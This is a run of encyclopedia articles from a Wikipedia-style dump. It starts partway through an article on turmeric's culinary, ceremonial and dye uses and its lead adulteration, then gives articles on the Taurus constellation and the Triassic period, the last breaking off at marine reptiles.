widely as a spice in South Asian and Middle Eastern cooking. Various Iranian khoresh recipes begin with onions caramelized in oil and turmeric. The Moroccan spice mix ras el hanout typically includes turmeric. In South Africa, turmeric is used to give boiled white rice a golden color, known as geelrys (yellow rice) traditionally served with bobotie. In Vietnamese cuisine, turmeric powder is used to color and enhance the flavors of certain dishes, such as bánh xèo, bánh khọt, and mì Quảng. The staple Cambodian curry paste, kroeung, used in many dishes, including fish amok, typically contains fresh turmeric. In Indonesia, turmeric leaves are used for Minang or Padang curry base of Sumatra, such as rendang, sate padang, and many other varieties. In the Philippines, turmeric is used in the preparation and cooking of kuning, satti, and some variants of adobo. In Thailand, fresh turmeric rhizomes are used widely in many dishes, in particular in the southern Thai cuisine, such as yellow curry and turmeric soup. Turmeric is used in a hot drink called "turmeric latte" or "golden milk" that is made with milk, frequently coconut milk. The turmeric milk drink known as haldī dūdh (haldī [] means turmeric in Hindi) is a traditional Indian recipe. Sold in the US and UK, the drink known as "golden milk" uses nondairy milk and sweetener, and sometimes black pepper after the traditional recipe (which may also use ghee). Turmeric is approved for use as a food color, assigned the code E100. The oleoresin is used for oil-containing products. In combination with annatto (E160b), turmeric has been used to color numerous food products. Turmeric is used to give a yellow color to some prepared mustards, canned chicken broths, and other foodsoften as a much cheaper replacement for saffron. Traditional uses In 2019, the European Medicines Agency concluded that turmeric herbal teas, or other forms taken by mouth, on the basis of their long-standing traditional use, could be used to relieve mild digestive problems, such as feelings of fullness and flatulence. Turmeric grows wild in the forests of South and Southeast Asia, where it is collected for use in classical Indian medicine (Siddha or Ayurveda). In Eastern India, the plant is used as one of the nine components of along with young plantain or banana plant, taro leaves, barley (), wood apple (), pomegranate (), Saraca indica, (Arum), or , and rice paddy. The Haldi ceremony called in Bengal (literally "yellow on the body") is a ceremony observed during wedding celebrations of people of Indian culture all throughout the Indian subcontinent. In Tamil Nadu and Andhra Pradesh, as a part of the Tamil–Telugu marriage ritual, dried turmeric tuber tied with string is used to create a Thali necklace. In western and coastal India, during weddings of the Marathi and Konkani people, Kannada Brahmins, turmeric tubers are tied with strings by the couple to their wrists during a ceremony, Kankana Bandhana. In many Hindu communities, turmeric paste is applied to the bride and groom as part of pre-wedding festivities known as the haldi ceremony. Turmeric makes a poor fabric dye, as it is not light fast, but is commonly used in Indian clothing, such as saris and Buddhist monks' robes. During the late Edo period (1603–1867), turmeric was used to dilute or substitute more expensive safflower dyestuff in the production of . Friedrich Ratzel reported in The History of Mankind during 1896, that in Micronesia, turmeric powder was applied for embellishment of body, clothing, utensils, and ceremonial uses. Native Hawaiians who introduced it to Hawaii () make a bright yellow dye out of it. Indicator Turmeric paper, also called curcuma paper or in German literature, Curcumapapier, is paper steeped in a tincture of turmeric and allowed to dry. It is used in chemical analysis as an indicator for acidity and alkalinity. The paper is yellow in acidic and neutral solutions and turns brown to reddish-brown in alkaline solutions, with transition between pH of 7.4 and 9.2. Adulteration As turmeric and other spices are commonly sold by weight, the potential exists for powders of toxic, cheaper agents with a similar color to be added, such as lead(II,IV) oxide ("red lead"). These additives give turmeric an orange-red color instead of its native gold-yellow, and such conditions led the US Food and Drug Administration (FDA) to issue import alerts from 2013 to 2019 on turmeric originating in India and Bangladesh. Imported into the United States in 2014 were approximately of turmeric, some of which was used for food coloring, traditional medicine, or dietary supplement. Lead detection in turmeric products led to recalls across the United States, Canada, Japan, Korea, and the United Kingdom through 2016. Lead chromate, a bright yellow chemical compound, was found as an adulterant of turmeric in Bangladesh, where turmeric is used commonly in foods and the contamination levels were up to 500 times higher than the national limit. Researchers identified a chain of sources adulterating the turmeric with lead chromate: from farmers to merchants selling low-grade turmeric roots to "polishers" who added lead chromate for yellow color enhancement, to wholesalers for market distribution, all unaware of the potential consequences of lead toxicity. Another common adulterant in turmeric, metanil yellow (also known as acid yellow 36), is considered by the British Food Standards Agency as an illegal dye for use in foods. Medical research Turmeric and curcumin have been studied in numerous clinical trials for various human diseases and conditions, with no high-quality evidence of any anti-disease effect or health benefit. There is no scientific evidence that curcumin reduces inflammation, . There is weak evidence that turmeric extracts may be beneficial for relieving symptoms of knee osteoarthritis, as well as for reducing pain and muscle damage following physical exercise. There is good evidence that turmeric is an allergen.
Biology and health sciences
Herbs and spices
Plants
29984
https://en.wikipedia.org/wiki/Taurus%20%28constellation%29
Taurus (constellation)
Taurus (Latin, 'Bull') is one of the constellations of the zodiac and is located in the northern celestial hemisphere. Taurus is a large and prominent constellation in the Northern Hemisphere's winter sky. It is one of the oldest constellations, dating back to the Early Bronze Age at least, when it marked the location of the Sun during the spring equinox. Its importance to the agricultural calendar influenced various bull figures in the mythologies of Ancient Sumer, Akkad, Assyria, Babylon, Egypt, Greece, and Rome. Its old astronomical symbol is (♉︎), which resembles a bull's head. A number of features exist that are of interest to astronomers. Taurus hosts two of the nearest open clusters to Earth, the Pleiades and the Hyades, both of which are visible to the naked eye. At first magnitude, the red giant Aldebaran is the brightest star in the constellation. In the northeast part of Taurus is Messier 1, more commonly known as the Crab Nebula, a supernova remnant containing a pulsar. One of the closest regions of active star formation, the Taurus-Auriga complex, crosses into the northern part of the constellation. The variable star T Tauri is the prototype of a class of pre-main-sequence stars. Characteristics Taurus is a large and prominent constellation in the northern hemisphere's winter sky, between Aries to the west and Gemini to the east; to the north lies Perseus and Auriga, to the southeast Orion, to the south Eridanus, and to the southwest Cetus. In late November-early December, Taurus reaches opposition (furthest point from the Sun) and is visible the entire night. By late March, it is setting at sunset and completely disappears behind the Sun's glare from May to July. This constellation forms part of the zodiac and hence is intersected by the ecliptic. This circle across the celestial sphere forms the apparent path of the Sun as the Earth completes its annual orbit. As the orbital plane of the Moon and the planets lie near the ecliptic, they can usually be found in the constellation Taurus during some part of each year. The galactic plane of the Milky Way intersects the northeast corner of the constellation and the galactic anticenter is located near the border between Taurus and Auriga. Taurus is the only constellation crossed by all three of the galactic equator, celestial equator, and ecliptic. A ring-like galactic structure known as Gould's Belt passes through the constellation. The recommended three-letter abbreviation for the constellation, as adopted by the International Astronomical Union in 1922, is "Tau". The official constellation boundaries, as set by Belgian astronomer Eugène Delporte in 1930, are defined by a polygon of 26 segments. In the equatorial coordinate system, the right ascension coordinates of these borders lie between and , while the declination coordinates are between 31.10° and −1.35°. Because a small part of the constellation lies to the south of the celestial equator, this can not be a completely circumpolar constellation at any latitude. Features Stars There are four stars above magnitude 3 in Taurus. The brightest member of this constellation is Aldebaran, an orange-hued, spectral class K5 III giant star. Its name derives from , Arabic for "the follower", probably from the fact that it follows the Pleiades during the nightly motion of the celestial sphere across the sky. Forming the profile of a Bull's face is a V or K-shaped asterism of stars. This outline is created by prominent members of the Hyades, the nearest distinct open star cluster after the Ursa Major Moving Group. In this profile, Aldebaran forms the bull's bloodshot eye, which has been described as "glaring menacingly at the hunter Orion", a constellation that lies just to the southeast. Aldebaran has around 116% the mass of the Sun. It also hosts a candidate exoplanet. The Hyades span about 5° of the sky, so that they can only be viewed in their entirety with binoculars or the unaided eye. It includes a naked eye double star, Theta Tauri (the proper name of Theta2 Tauri is Chamukuy), with a separation of 5.6 arcminutes. In the northwestern quadrant of the Taurus constellation lie the Pleiades (M45), one of the best known open clusters, easily visible to the naked eye. The seven most prominent stars in this cluster are at least visual magnitude six, and so the cluster is also named the "Seven Sisters". However, many more stars are visible with even a modest telescope. Astronomers estimate that the cluster has approximately 500–1,000 stars, all of which are around 100 million years old. However, they vary considerably in type. The Pleiades themselves are represented by large, bright stars; also many small brown dwarfs and white dwarfs exist. The cluster is estimated to dissipate in another 250 million years. The Pleiades cluster is classified as a Shapley class c and Trumpler class I 3 r n cluster, indicating that it is irregularly shaped and loose, though concentrated at its center and detached from the star-field. To the east, the two horns of the bull are formed by Beta (β) Tauri and Zeta (ζ) Tauri; two star systems that are separated by 8°. Beta is a white, spectral class B7 III giant star known as El Nath, which comes from the Arabic phrase "the butting", as in butting by the horns of the bull. At magnitude 1.65, it is the second brightest star in the constellation, and shares the border with the neighboring constellation of Auriga. As a result, it also bears the designation Gamma Aurigae. Zeta Tauri (the proper name is Tianguan) is an eclipsing binary star that completes an orbit every 133 days. The star Lambda (λ) Tauri is an eclipsing binary star. This system consists of a spectral class B3 star being orbited by a less massive class A4 star. The plane of their orbit lies almost along the line of sight to the Earth. Every 3.953 days the system temporarily decreases in brightness by 1.1 magnitudes as the brighter star is partially eclipsed by the dimmer companion. The two stars are separated by only 0.1 astronomical units, so their shapes are modified by mutual tidal interaction. This results in a variation of their net magnitude throughout each orbit. Located about 1.8° west of Epsilon (ε) Tauri is T Tauri, the prototype of a class of variable stars called T Tauri stars. This star undergoes erratic changes in luminosity, varying between magnitude 9 to 13 over a period of weeks or months. This is a newly formed stellar object that is just emerging from its envelope of gas and dust, but has not yet become a main sequence star. The surrounding reflection nebula NGC 1555 is illuminated by T Tauri, and thus is also variable in luminosity. To the north lies Kappa Tauri, a visual double star consisting of two A7-type components. The pair have a separation of just 5.6 arc minutes, making them a challenge to split with the naked eye. Deep-sky objects In the northern part of the constellation to the northeast of the Pleiades lies the Crystal Ball Nebula, known by its catalogue designation of NGC 1514. This planetary nebula is of historical interest following its discovery by German-born English astronomer William Herschel in 1790. Prior to that time, astronomers had assumed that nebulae were simply unresolved groups of stars. However, Herschel could clearly resolve a star at the center of the nebula that was surrounded by a nebulous cloud of some type. In 1864, English astronomer William Huggins used the spectrum of this nebula to deduce that the nebula is a luminous gas, rather than stars. North-west of ζ Tauri by 1.15 degrees is the Crab Nebula (M1), a supernova remnant. This expanding nebula was created by a Type II supernova explosion, which was seen from Earth on July 4, 1054. It was bright enough to be observed during the day and is mentioned in Chinese historical texts. At its peak, the supernova reached magnitude −4, but the nebula is currently magnitude 8.4 and requires a telescope to observe. North American peoples also observed the supernova, as evidenced from a painting on a New Mexican canyon and various pieces of pottery that depict the event. However, the remnant itself was not discovered until 1731, when John Bevis found it. This constellation includes part of the Taurus-Auriga complex, or Taurus dark clouds, a star-forming region containing sparse, filamentary clouds of gas and dust. This spans a diameter of and contains 35,000 solar masses of material, which is both larger and less massive than the Orion Nebula. At a distance of , this is one of the nearest active star forming regions. Located in this region, about 10° to the northeast of Aldebaran, is an asterism NGC 1746 spanning a width of 45 arcminutes. Meteor showers During November, the Taurid meteor shower appears to radiate from the general direction of this constellation. The Beta Taurid meteor shower occurs during the months of June and July in the daytime, and is normally observed using radio techniques. Between 18 and 29 October, both the Northern Taurids and the Southern Taurids are active; though the latter stream is stronger. However, between November 1 and 10, the two streams equalize. History and mythology The identification of the constellation of Taurus with a bull is very old, certainly dating to the Chalcolithic, and perhaps even to the Upper Paleolithic. Michael Rappenglück of the University of Munich believes that Taurus is represented in a cave painting at the Hall of the Bulls in the caves at Lascaux (dated to roughly 15,000 BC), which he believes is accompanied by a depiction of the Pleiades. The name "seven sisters" has been used for the Pleiades in the languages of many cultures, including indigenous groups of Australia, North America and Siberia. This suggests that the name may have a common ancient origin. Taurus marked the point of vernal (spring) equinox in the Chalcolithic and the Early Bronze Age, from about 4000 BC to 1700 BC, after which it moved into the neighboring constellation Aries. The Pleiades were closest to the Sun at vernal equinox around the 23rd century BC. In Babylonian astronomy, the constellation was listed in the MUL.APIN as , "The Bull of Heaven". Although it has been claimed that "when the Babylonians first set up their zodiac, the vernal equinox lay in Taurus," there is a claim that the MUL.APIN tablets indicate that the vernal equinox was marked by the Babylonian constellation known as "the hired man" (the modern Aries). In the Old Babylonian Epic of Gilgamesh, the goddess Ishtar sends Taurus, the Bull of Heaven, to kill Gilgamesh for spurning her advances. Enkidu tears off the bull's hind part and hurls the quarters into the sky where they become the stars we know as Ursa Major and Ursa Minor. Some locate Gilgamesh as the neighboring constellation of Orion, facing Taurus as if in combat, while others identify him with the sun whose rising on the equinox vanquishes the constellation. In early Mesopotamian art, the Bull of Heaven was closely associated with Inanna, the Sumerian goddess of sexual love, fertility, and warfare. One of the oldest depictions shows the bull standing before the goddess' standard; since it has 3 stars depicted on its back (the cuneiform sign for "star-constellation"), there is good reason to regard this as the constellation later known as Taurus. The same iconic representation of the Heavenly Bull was depicted in the Dendera zodiac, an Egyptian bas-relief carving in a ceiling that depicted the celestial hemisphere using a planisphere. In these ancient cultures, the orientation of the horns was portrayed as upward or backward. This differed from the later Greek depiction where the horns pointed forward. To the Egyptians, the constellation Taurus was a sacred bull that was associated with the renewal of life in spring. When the spring equinox entered Taurus, the constellation would become covered by the Sun in the western sky as spring began. This "sacrifice" led to the renewal of the land. To the early Hebrews, Taurus was the first constellation in their zodiac and consequently it was represented by the first letter in their alphabet, Aleph. In Greek mythology, Taurus was identified with Zeus, who assumed the form of a magnificent white bull to abduct Europa, a legendary Phoenician princess. In illustrations of Greek mythology, only the front portion of this constellation is depicted; this was sometimes explained as Taurus being partly submerged as he carried Europa out to sea. A second Greek myth portrays Taurus as Io, a mistress of Zeus. To hide his lover from his wife Hera, Zeus changed Io into the form of a heifer. Greek mythographer Acusilaus marks the bull Taurus as the same that formed the myth of the Cretan Bull, one of The Twelve Labors of Heracles. Taurus became an important object of worship among the Druids. Their Tauric religious festival was held while the Sun passed through the constellation. Among the arctic people known as the Inuit, the constellation is called Sakiattiat and the Hyades is Nanurjuk, with the latter representing the spirit of the polar bear. Aldebaran represents the bear, with the remainder of the stars in the Hyades being dogs that are holding the beast at bay. In Buddhism, legends hold that Gautama Buddha was born when the full moon was in Vaisakha, or Taurus. Buddha's birthday is celebrated with the Wesak Festival, or Vesākha, which occurs on the first or second full moon when the Sun is in Taurus. In 1990, due to the precession of the equinoxes, the position of the Sun on the first day of summer (June 21) crossed the IAU boundary of Gemini into Taurus. The Sun will slowly move through Taurus at a rate of 1° east every 72 years until approximately 2600 AD, at which point it will be in Aries on the first day of summer. Astrology , the Sun appears in the constellation Taurus from May 13 to June 21. In tropical astrology, the Sun is considered to be in the sign Taurus from April 20 to May 20. Space exploration The space probe Pioneer 10 is moving in the direction of this constellation, though it will not be nearing any of the stars in this constellation for many thousands of years, by which time its batteries will be long dead. Solar eclipse of May 29, 1919 Several stars in the Hyades star cluster, including Kappa Tauri, were photographed during the total solar eclipse of May 29, 1919, by the expedition of Arthur Eddington in Príncipe and others in Sobral, Brazil, that confirmed Albert Einstein's prediction of the bending of light around the Sun according to his general theory of relativity which he published in 1915.
Physical sciences
Zodiac
Astronomy
29989
https://en.wikipedia.org/wiki/Triassic
Triassic
The Triassic ( ; sometimes symbolized 🝈) is a geologic period and system which spans 50.5 million years from the end of the Permian Period 251.902 million years ago (Mya), to the beginning of the Jurassic Period 201.4 Mya. The Triassic is the first and shortest period of the Mesozoic Era and the seventh period of the Phanerozoic Eon. Both the start and end of the period are marked by major extinction events. The Triassic Period is subdivided into three epochs: Early Triassic, Middle Triassic and Late Triassic. The Triassic began in the wake of the Permian–Triassic extinction event, which left the Earth's biosphere impoverished; it was well into the middle of the Triassic before life recovered its former diversity. Three categories of organisms can be distinguished in the Triassic record: survivors from the extinction event, new groups that flourished briefly, and other new groups that went on to dominate the Mesozoic Era. Reptiles, especially archosaurs, were the chief terrestrial vertebrates during this time. A specialized group of archosaurs, called dinosaurs, first appeared in the Late Triassic but did not become dominant until the succeeding Jurassic Period. Archosaurs that became dominant in this period were primarily pseudosuchians, relatives and ancestors of modern crocodilians, while some archosaurs specialized in flight, the first time among vertebrates, becoming the pterosaurs. Therapsids, the dominant vertebrates of the preceding Permian period, saw a brief surge in diversification in the Triassic, with dicynodonts and cynodonts quickly becoming dominant, but they declined throughout the period with the majority becoming extinct by the end. However, the first stem-group mammals (mammaliamorphs), themselves a specialized subgroup of cynodonts, appeared during the Triassic and would survive the extinction event, allowing them to radiate during the Jurassic. Amphibians were primarily represented by the temnospondyls, giant aquatic predators that had survived the end-Permian extinction and saw a new burst of diversification in the Triassic, before going extinct by the end; however, early crown-group lissamphibians (including stem-group frogs, salamanders and caecilians) also became more common during the Triassic and survived the extinction event. The earliest known neopterygian fish, including early holosteans and teleosts, appeared near the beginning of the Triassic, and quickly diversified to become among the dominant groups of fish in both freshwater and marine habitats. The vast supercontinent of Pangaea dominated the globe during the Triassic, but in the latest Triassic (Rhaetian) and Early Jurassic it began to gradually rift into two separate landmasses: Laurasia to the north and Gondwana to the south. The global climate during the Triassic was mostly hot and dry, with deserts spanning much of Pangaea's interior. However, the climate shifted and became more humid as Pangaea began to drift apart. The end of the period was marked by yet another major mass extinction, the Triassic–Jurassic extinction event, that wiped out many groups, including most pseudosuchians, and allowed dinosaurs to assume dominance in the Jurassic. Etymology The Triassic was named in 1834 by Friedrich August von Alberti, after a succession of three distinct rock layers (Greek meaning 'triad') that are widespread in southern Germany: the lower Buntsandstein (colourful sandstone), the middle Muschelkalk (shell-bearing limestone) and the upper Keuper (coloured clay). Dating and subdivisions On the geologic time scale, the Triassic is usually divided into Early, Middle, and Late Triassic Epochs, and the corresponding rocks are referred to as Lower, Middle, or Upper Triassic. The faunal stages from the youngest to oldest are: Paleogeography During the Triassic, almost all the Earth's land mass was concentrated into a single supercontinent, Pangaea (). This supercontinent was more-or-less centered on the equator and extended between the poles, though it did drift northwards as the period progressed. Southern Pangea, also known as Gondwana, was made up by closely-appressed cratons corresponding to modern South America, Africa, Madagascar, India, Antarctica, and Australia. North Pangea, also known as Laurussia or Laurasia, corresponds to modern-day North America and the fragmented predecessors of Eurasia. The western edge of Pangea lay at the margin of an enormous ocean, Panthalassa (), which roughly corresponds to the modern Pacific Ocean. Practically all deep-ocean crust present during the Triassic has been recycled through the subduction of oceanic plates, so very little is known about the open ocean from this time period. Most information on Panthalassan geology and marine life is derived from island arcs and rare seafloor sediments accreted onto surrounding land masses, such as present-day Japan and western North America. The eastern edge of Pangea was encroached upon by a pair of extensive oceanic basins: The Neo-Tethys (or simply Tethys) and Paleo-Tethys Oceans. These extended from China to Iberia, hosting abundant marine life along their shallow tropical peripheries. They were divided from each other by a long string of microcontinents known as the Cimmerian terranes. Cimmerian crust had detached from Gondwana in the early Permian and drifted northwards during the Triassic, enlarging the Neo-Tethys Ocean which formed in their wake. At the same time, they forced the Paleo-Tethys Ocean to shrink as it was being subducted under Asia. By the end of the Triassic, the Paleo-Tethys Ocean occupied a small area and the Cimmerian terranes began to collide with southern Asia. This collision, known as the Cimmerian Orogeny, continued into the Jurassic and Cretaceous to produce a chain of mountain ranges stretching from Turkey to Malaysia.Pangaea was fractured by widespread faulting and rift basins during the Triassic—especially late in that period—but had not yet separated. The first nonmarine sediments in the rift that marks the initial break-up of Pangaea, which separated eastern North America from Morocco, are of Late Triassic age; in the United States, these thick sediments comprise the Newark Supergroup. Rift basins are also common in South America, Europe, and Africa. Terrestrial environments are particularly well-represented in the South Africa, Russia, central Europe, and the southwest United States. Terrestrial Triassic biostratigraphy is mostly based on terrestrial and freshwater tetrapods, as well as conchostracans ("clam shrimps"), a type of fast-breeding crustacean which lived in lakes and hypersaline environments. Because a supercontinent has less shoreline compared to a series of smaller continents, Triassic marine deposits are relatively uncommon on a global scale. A major exception is in Western Europe, where the Triassic was first studied. The northeastern margin of Gondwana was a stable passive margin along the Neo-Tethys Ocean, and marine sediments have been preserved in parts of northern India and Arabia. In North America, marine deposits are limited to a few exposures in the west. Scandinavia During the Triassic peneplains are thought to have formed in what is now Norway and southern Sweden. Remnants of this peneplain can be traced as a tilted summit accordance in the Swedish West Coast. In northern Norway Triassic peneplains may have been buried in sediments to be then re-exposed as coastal plains called strandflats. Dating of illite clay from a strandflat of Bømlo, southern Norway, have shown that landscape there became weathered in Late Triassic times ( 210 million years ago) with the landscape likely also being shaped during that time. Paleooceanography Eustatic sea level in the Triassic was consistently low compared to the other geological periods. The beginning of the Triassic was around present sea level, rising to about above present-day sea level during the Early and Middle Triassic. Sea level rise accelerated in the Ladinian, culminating with a sea level up to above present-day levels during the Carnian. Sea level began to decline in the Norian, reaching a low of below present sea level during the mid-Rhaetian. Low global sea levels persisted into the earliest Jurassic. The long-term sea level trend is superimposed by 22 sea level drop events widespread in the geologic record, mostly of minor (less than ) and medium () magnitudes. A lack of evidence for Triassic continental ice sheets suggest that glacial eustasy is unlikely to be the cause of these changes. Climate The Triassic continental interior climate was generally hot and dry, so that typical deposits are red bed sandstones and evaporites. There is no evidence of glaciation at or near either pole; in fact, the polar regions were apparently moist and temperate, providing a climate suitable for forests and vertebrates, including reptiles. Pangaea's large size limited the moderating effect of the global ocean; its continental climate was highly seasonal, with very hot summers and cold winters. The strong contrast between the Pangea supercontinent and the global ocean triggered intense cross-equatorial monsoons, sometimes referred to as the Pangean megamonsoons. The Triassic may have mostly been a dry period, but evidence exists that it was punctuated by several episodes of increased rainfall in tropical and subtropical latitudes of the Tethys Sea and its surrounding land. Sediments and fossils suggestive of a more humid climate are known from the Anisian to Ladinian of the Tethysian domain, and from the Carnian and Rhaetian of a larger area that includes also the Boreal domain (e.g., Svalbard Islands), the North American continent, the South China block and Argentina. The best-studied of such episodes of humid climate, and probably the most intense and widespread, was the Carnian Pluvial Event. Early Triassic The Early Triassic was the hottest portion of the entire Phanerozoic, seeing as it occurred during and immediately after the discharge of titanic volumes of greenhouse gases from the Siberian Traps. The Early Triassic began with the Permian-Triassic Thermal Maximum (PTTM) and was followed by the brief Dienerian Cooling (DC) from 251 to 249 Ma, which was in turn followed by the Latest Smithian Thermal Maximum (LSTT) around 249 to 248 Ma. During the Latest Olenekian Cooling (LOC), from 248 to 247 Ma, temperatures cooled by about 6 °C. Middle Triassic The Middle Triassic was cooler than the Early Triassic, with temperatures falling over most of the Anisian, with the exception of a warming spike in the latter portion of the stage. From 242 to 233 Ma, the Ladinian-Carnian Cooling (LCC) ensued. Late Triassic At the beginning of the Carnian, global temperatures continued to be relatively cool. The eruption of the Wrangellia Large Igneous Province around 234 Ma caused abrupt global warming, terminating the cooling trend of the LCC. This warming was responsible for the Carnian Pluvial Event and resulted in an episode of widespread global humidity. The CPE ushered in the Mid-Carnian Warm Interval (MCWI), which lasted from 234 to 227 Ma. At the Carnian-Norian boundary occurred a positive δ13C excursion believed to signify an increase in organic carbon burial. From 227 to 217 Ma, there was a relatively cool period known as the Early Norian Cool Interval (ENCI), after which occurred the Mid-Norian Warm Interval (MNWI) from 217 to 209 Ma. The MNWI was briefly interrupted around 214 Ma by a cooling possibly related to the Manicouagan impact. Around 212 Ma, a 10 Myr eccentricity maximum caused a paludification of Pangaea and a reduction in the size of arid climatic zones. The Rhaetian Cool Interval (RCI) lasted from 209 to 201 Ma. At the terminus of the Triassic, there was an extreme warming event referred to as the End-Triassic Thermal Event (ETTE), which was responsible for the Triassic-Jurassic mass extinction. Bubbles of carbon dioxide in basaltic rocks dating back to the end of the Triassic indicate that volcanic activity from the Central Atlantic Magmatic Province helped trigger climate change in the ETTE. Flora Land plants During the Early Triassic, lycophytes, particularly those of the order Isoetales (which contains living quillworts), rose to prominence due to the environmental instability following the Permian-Triassic extinction, with one particularly notable example being the genus Pleuromeia, which grew in columnar like fashion, sometimes reaching a height of . The relevance of lycophytes declined from the Middle Triassic onwards, following the return of more stable environmental conditions. While having first appeared during the Permian, the extinct seed plant group Bennettitales first became a prominent element in global floras during the Late Triassic, a position they would hold for much of the Mesozoic. In the Southern Hemisphere landmasses of Gondwana, the tree Dicroidium, an extinct "seed fern" belong to the order Corystospermales was a dominant element in forest habitats across the region during the Middle-Late Triassic. During the Late Triassic, the Ginkgoales (which today are represented by only a single species, Ginkgo biloba) underwent considerable diversification. Conifers were abundant during the Triassic, and included the Voltziales (which contains various lineages, probably including those ancestral to modern conifers), as well as the extinct family Cheirolepidiaceae, which first appeared in the Late Triassic, and would be prominent throughout most of the rest of the Mesozoic. Coal No known coal deposits date from the start of the Triassic Period. This is known as the Early Triassic "coal gap" and can be seen as part of the Permian–Triassic extinction event. Possible explanations for the coal gap include sharp drops in sea level at the time of the Permo-Triassic boundary; acid rain from the Siberian Traps eruptions or from an impact event that overwhelmed acidic swamps; climate shift to a greenhouse climate that was too hot and dry for peat accumulation; evolution of fungi or herbivores that were more destructive of wetlands; the extinction of all plants adapted to peat swamps, with a hiatus of several million years before new plant species evolved that were adapted to peat swamps; or soil anoxia as oxygen levels plummeted. Phytoplankton Before the Permian extinction, Archaeplastida (red and green algae) had been the major marine phytoplanktons since about 659–645 million years ago, when they replaced marine planktonic cyanobacteria, which first appeared about 800 million years ago, as the dominant phytoplankton in the oceans. In the Triassic, secondary endosymbiotic algae became the most important plankton. Fauna Marine invertebrates In marine environments, new modern types of corals appeared in the Early Triassic, forming small patches of reefs of modest extent compared to the great reef systems of Devonian or modern times. At the end of the Carnian, a reef crisis occurred in South China. Serpulids appeared in the Middle Triassic. Microconchids were abundant. The shelled cephalopods called ammonites recovered, diversifying from a single line that survived the Permian extinction. Bivalves began to rapidly diversify during the Middle Triassic, becoming highly abundant in the oceans. Insects Aquatic insects rapidly diversified during the Middle Triassic, with this time interval representing a crucial diversification for Holometabola, the clade containing the majority of modern insect species. Fish In the wake of the Permian-Triassic mass extinction event, the fish fauna was remarkably uniform, with many families and genera exhibiting a cosmopolitan distribution. Coelacanths show their highest post-Devonian diversity in the Early Triassic. Ray-finned fishes (actinopterygians) went through a remarkable diversification in the beginning of the Triassic, leading to peak diversity during the Middle Triassic; however, the pattern of this diversification is still not well understood due to a taphonomic megabias. The first stem-group teleosts appeared during the Triassic (teleosts are by far the most diverse group of fish today). Predatory actinopterygians such as saurichthyids and birgeriids, some of which grew over in length, appeared in the Early Triassic and became widespread and successful during the period as a whole. Lakes and rivers were populated by lungfish (Dipnoi), such as Ceratodus, which are mainly known from the dental plates, abundant in the fossils record. Hybodonts, a group of shark-like cartilaginous fish, were dominant in both freshwater and marine environments throughout the Triassic. Last survivors of the mainly Palaeozoic Eugeneodontida are known from the Early Triassic. Amphibians Temnospondyl amphibians were among those groups that survived the Permian–Triassic extinction. Once abundant in both terrestrial and aquatic environments, the terrestrial species had mostly died out during the extinction event. The Triassic survivors were aquatic or semi-aquatic, and were represented by Tupilakosaurus, Thabanchuia, Branchiosauridae and Micropholis, all of which died out in Early Triassic, and the successful Stereospondyli, with survivors into the Cretaceous Period. The largest Triassic stereospondyls, such as Mastodonsaurus, were up to in length. Some lineages (e.g. trematosaurs) flourished briefly in the Early Triassic, while others (e.g. capitosaurs) remained successful throughout the whole period, or only came to prominence in the Late Triassic (e.g. Plagiosaurus, metoposaurs). The first Lissamphibians (modern amphibians) appear in the Triassic, with the progenitors of the first frogs already present by the Early Triassic. However, the group as a whole did not become common until the Jurassic, when the temnospondyls had become very rare. Most of the Reptiliomorpha, stem-amniotes that gave rise to the amniotes, disappeared in the Triassic, but two water-dwelling groups survived: Embolomeri that only survived into the early part of the period, and the Chroniosuchia, which survived until the end of the Triassic. Reptiles Archosauromorphs The Permian–Triassic extinction devastated terrestrial life. Biodiversity rebounded as the surviving species repopulated empty terrain, but these were short-lived. Diverse communities with complex food-web structures took 30 million years to reestablish. Archosauromorph reptiles, which had already appeared and diversified to an extent in the Permian Period, exploded in diversity as an adaptive radiation in response to the Permian-Triassic mass extinction. By the Early Triassic, several major archosauromorph groups had appeared. Long-necked, lizard-like early archosauromorphs were known as protorosaurs, which is likely a paraphyletic group rather than a true clade. Tanystropheids were a family of protorosaurs which elevated their neck size to extremes, with the largest genus Tanystropheus having a neck longer than its body. The protorosaur family Sharovipterygidae used their elongated hindlimbs for gliding. Other archosauromorphs, such as rhynchosaurs and allokotosaurs, were mostly stocky-bodied herbivores with specialized jaw structures. Rhynchosaurs, barrel-gutted herbivores, thrived for only a short period of time, becoming extinct about 220 million years ago. They were exceptionally abundant in the middle of the Triassic, as the primary large herbivores in many Carnian-age ecosystems. They sheared plants with premaxillary beaks and plates along the upper jaw with multiple rows of teeth. Allokotosaurs were iguana-like reptiles, including Trilophosaurus (a common Late Triassic reptile with three-crowned teeth), Teraterpeton (which had a long beak-like snout), and Shringasaurus (a horned herbivore which reached a body length of ). One group of archosauromorphs, the archosauriforms, were distinguished by their active predatory lifestyle, with serrated teeth and upright limb postures. Archosauriforms were diverse in the Triassic, including various terrestrial and semiaquatic predators of all shapes and sizes. The large-headed and robust erythrosuchids were among the dominant carnivores in the early Triassic. Phytosaurs were a particularly common group which prospered during the Late Triassic. These long-snouted and semiaquatic predators resemble living crocodiles and probably had a similar lifestyle, hunting for fish and small reptiles around the water's edge. However, this resemblance is only superficial and is a prime-case of convergent evolution. True archosaurs appeared in the early Triassic, splitting into two branches: Avemetatarsalia (the ancestors to birds) and Pseudosuchia (the ancestors to crocodilians). Avemetatarsalians were a minor component of their ecosystems, but eventually produced the earliest pterosaurs and dinosaurs in the Late Triassic. Early long-tailed pterosaurs appeared in the Norian and quickly spread worldwide. Triassic dinosaurs evolved in the Carnian and include early sauropodomorphs and theropods. Most Triassic dinosaurs were small predators and only a few were common, such as Coelophysis, which was long. Triassic sauropodomorphs primarily inhabited cooler regions of the world. The large predator Smok was most likely also an archosaur, but it is uncertain if it was a primitive dinosaur or a pseudosuchian. Pseudosuchians were far more ecologically dominant in the Triassic, including large herbivores (such as aetosaurs), large carnivores ("rauisuchians"), and the first crocodylomorphs ("sphenosuchians"). Aetosaurs were heavily-armored reptiles that were common during the last 30 million years of the Late Triassic until they died out at the Triassic-Jurassic extinction. Most aetosaurs were herbivorous and fed on low-growing plants, but some may have eaten meat. "rauisuchians" (formally known as paracrocodylomorphs) were the keystone predators of most Triassic terrestrial ecosystems. Over 25 species have been found, including giant quadrupedal hunters, sleek bipedal omnivores, and lumbering beasts with deep sails on their backs. They probably occupied the large-predator niche later filled by theropods. "Rauisuchians" were ancestral to small, lightly-built crocodylomorphs, the only pseudosuchians which survived into the Jurassic. Marine reptiles There were many types of marine reptiles. These included the Sauropterygia, which featured pachypleurosaurus and nothosaurs (both common during the Middle Triassic, especially in the Tethys region), placodonts, the earliest known herbivorous marine reptile Atopodentatus, and the first plesiosaurs. 